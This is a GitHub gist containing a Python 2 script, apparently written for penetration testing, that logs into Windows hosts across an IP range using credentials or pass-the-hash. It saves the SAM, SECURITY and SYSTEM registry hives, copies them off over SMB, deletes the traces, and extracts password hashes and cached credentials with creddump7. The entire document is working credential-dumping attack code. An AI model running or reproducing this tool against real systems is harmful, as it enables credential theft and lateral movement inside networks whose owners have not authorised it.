Created
October 19, 2016 08:21
-
-
Save llandeilocymro/d8e2d8b6ba18551eaf3951c76888ac04 to your computer and use it in GitHub Desktop.
Safe way to grab windows hashes remotley (SAM, SYSTEM and SECURITY)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/python | |
| # EDW - NCCGroup | |
| # wrapper to safely get hashes from a box | |
| # needs winexe, smbclient and creddump7 | |
| # v0.2 Rich - added colors, pth-winexe, pth-smbexec and scan over a range | |
| # v0.3 EDW - added threading | |
| import os | |
| import optparse | |
| import signal | |
| from netaddr import IPNetwork | |
| import sys | |
| import threading | |
| try: | |
| from termcolor import colored #This one is for coloring text | |
| except: | |
| print colored('termcolor appears to be missing - try: pip install termcolor','red') | |
| p = optparse.OptionParser("usage: %prog host username password", version="%prog 0.3") | |
| p.add_option("-H", "--host", dest="host", type="string", help="specify hostname to grab hashes from") | |
| p.add_option("-u", "--username", dest="username", type="string", default="administrator",help="username") | |
| p.add_option("-p", "--password", dest="password", type="string", default="Password01", help="password") | |
| (options, args) = p.parse_args() | |
| targets = options.host | |
| user = options.username | |
| passw = options.password | |
| print colored("\nE D Williams - NCCGroup",'red') | |
| print colored("Cymru am byth\n",'green') | |
| winexe = os.system("which pth-winexe > /dev/null") | |
| if winexe != 0: | |
| print colored("[-] pth-winexe not installed",'red') | |
| exit(1) | |
| else: | |
| print colored("[+] pth-winexe installed",'green') | |
| smb = os.system("which pth-smbclient > /dev/null") | |
| if smb != 0: | |
| print colored("[-] pth-smbclient not installed",'red') | |
| exit(1) | |
| else: | |
| print colored("[+] pth-smbclient installed",'green') | |
| c = os.path.isdir('creddump7') | |
| if c == 'False': | |
| print colored("[-] creddump7 not installed - https://github.com/Neohapsis/creddump7",'red') | |
| exit(1) | |
| else: | |
| print colored("[+] creddump7 found",'green') | |
| files = ['sam', 'system', 'security'] | |
| progs = ['lsadump','cachedump'] | |
| def work(host): | |
| return_value=os.system("/usr/bin/pth-winexe -U \""+host+"\\"+user+"%"+passw+"\" --system \/\/"+host+" \"cmd.exe /C \" 2>/dev/null") | |
| signal_number = (return_value & 0x0F) | |
| if not signal_number: | |
| exit_status = (return_value >> 8) | |
| if exit_status: | |
| print colored("[-] Unable to connect to "+host,'red') | |
| next | |
| else: | |
| if not os.path.exists(host): | |
| os.makedirs(host) | |
| print colored("[+] Creating directory for host: "+str(host),'green') | |
| try: | |
| print colored("[+] Enumerating SAM, SYSTEM and SECURITY reg hives",'green') | |
| os.system("/usr/bin/pth-winexe -U \""+host+"\\"+user+"%"+passw+"\" --system \/\/"+host+" \"cmd.exe /C reg save HKLM\sam c:\sam && reg.exe save HKLM\security C:\security && reg.exe save HKLM\system C:\system\"") | |
| except OSError: | |
| print colored("[-] Something went wrong here getting reg hives from "+host,'red') | |
| for f in files: | |
| try: | |
| print colored("[+]getting: "+f,'yellow') | |
| os.system("pth-smbclient //"+host+"/c$ -U "+user+"%"+passw+" -c 'lcd "+host+"; get "+f+"\' 2>/dev/null") | |
| except OSError: | |
| print colored("[-] Something went wrong here getting files via smbclient("+f+")",'red') | |
| try: | |
| print colored("[+]removing SAM, SYSTEM and SECURITY reg hives from: "+host,'green') | |
| os.system("/usr/bin/pth-winexe -U \""+host+"\\"+user+"%"+passw+"\" --system \/\/"+host+" \"cmd.exe /C del c:\sam && del c:\security && del c:\system\"") | |
| except OSError: | |
| print colored("[-] Something went wrong here getting reg hivese",'red') | |
| try: | |
| print colored("[+]Using pwdump",'green') | |
| if os.path.exists("creddump7/pwdump.py"): | |
| os.system("creddump7/pwdump.py "+host+"/system "+host+"/sam | tee "+host+"/pwdump") | |
| except OSError: | |
| print colored("[-]Something went wrong extracting from pwdump",'red') | |
| for p in progs: | |
| try: | |
| print colored("[+]Using "+p ,'green') | |
| if os.path.exists("creddump7/"+p+".py"): | |
| os.system("creddump7/"+p+".py "+host+"/system "+host+"/security true | tee "+host+"/"+p+"") | |
| except OSError: | |
| print colored("[-]Something went wrong extracting from "+p,'red') | |
| def signal_handler(signal, frame): | |
| print colored("\nCtrl+C pressed.. aborting...",'red') | |
| sys.exit() | |
| def main(): | |
| for target in IPNetwork(targets): | |
| host=str(target) | |
| try: | |
| t = threading.Thread(target=work, args=(host, )) | |
| t.start() | |
| except: | |
| print "threading error" | |
| if __name__ == '__main__': | |
| signal.signal(signal.SIGINT, signal_handler) | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment